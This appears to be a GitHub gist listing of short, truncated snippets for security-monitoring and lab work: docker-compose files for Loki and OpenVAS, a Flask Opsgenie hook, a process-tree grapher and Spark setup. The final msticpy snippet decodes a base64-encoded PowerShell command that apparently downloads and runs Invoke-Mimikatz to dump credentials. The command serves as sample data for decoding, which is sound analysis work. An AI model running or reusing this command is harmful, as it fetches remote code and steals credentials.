BoredHackerBlog

# requires dictquery (pip3 install dictquery or get it from here: https://github.com/cyberlis/dictquery)
import dictquery as dq

#each rule needs to be a new line
#rule format, RULENAME|RULE
#rule syntax: https://github.com/cyberlis/dictquery#dictquery
rules_file = "rules.txt" 

rules = {}

BoredHackerBlog

# root@host:~# cat /etc/netplan/01-netcfg.yaml  
network:
  version: 2
  renderer: networkd
  ethernets:
    eth0:
      dhcp4: yes
    eth1:
      dhcp4: no
    eth2:

BoredHackerBlog

from flask import request
from flask import Flask
import opsgenie_sdk

app = Flask(__name__)

og = opsgenie_sdk.configuration.Configuration()
og.api_key['Authorization'] = ""
og.api_client = opsgenie_sdk.api_client.ApiClient(configuration=og)
og.alert_api = opsgenie_sdk.AlertApi(api_client=og.api_client)

BoredHackerBlog

version: "3"

networks:
  loki:

services:
  loki:
    image: grafana/loki:2.4.0
    volumes:
      - ./loki:/etc/loki

BoredHackerBlog

#taken from here: https://github.com/immauss/openvas/blob/master/compose/docker-compose.yml
#as of jan 9th 2022, it works fine. takes some time to download feeds initially.
version: "3"
services:
  openvas:
    ports:
      - "8080:9392"
    environment:
      - "PASSWORD=admin"
      - "USERNAME=admin"

BoredHackerBlog

import requests
from time import sleep

while True:
    try:
        if requests.get("http://localhost:8080").status_code == 200:
            break
        else:
            sleep(5)
    except:

BoredHackerBlog

name: build and upload container

on:
  push:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-latest

BoredHackerBlog

from graphviz import Digraph

process_data = []
process_data.append({"pid":"1", "ppid":"204", "path":"c:/cmd.exe"})
process_data.append({"pid":"4", "ppid":"204", "path":"c:/powershell.exe"})
process_data.append({"pid":"204", "ppid":"0", "path":"c:/svhost.exe"})
process_data.append({"pid":"8", "ppid":"4", "path":"c:/net.exe"})
process_data.append({"pid":"10", "ppid":"4", "path":"c:/netsh.exe"})

def graph_process(jsonarray, pid_key, ppid_key, label_key):

BoredHackerBlog

In [1]: from pyspark.sql import SparkSession                                                                                                                          

In [2]: spark = SparkSession \ 
   ...:     .builder \ 
   ...:     .appName("example") \ 
   ...:     .getOrCreate()                                                                                                                                            
22/04/29 18:55:18 WARN Utils: Your hostname, ubuntu resolves to a loopback address: 127.0.1.1; using 192.168.95.155 instead (on interface ens33)
22/04/29 18:55:18 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties
Setting default log level to "WARN".

BoredHackerBlog

from msticpy.nbtools import *
from msticpy.sectools import *

command = "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA=="

out = base64.unpack(command)

print(out[1]['decoded_string'][0])

# it should print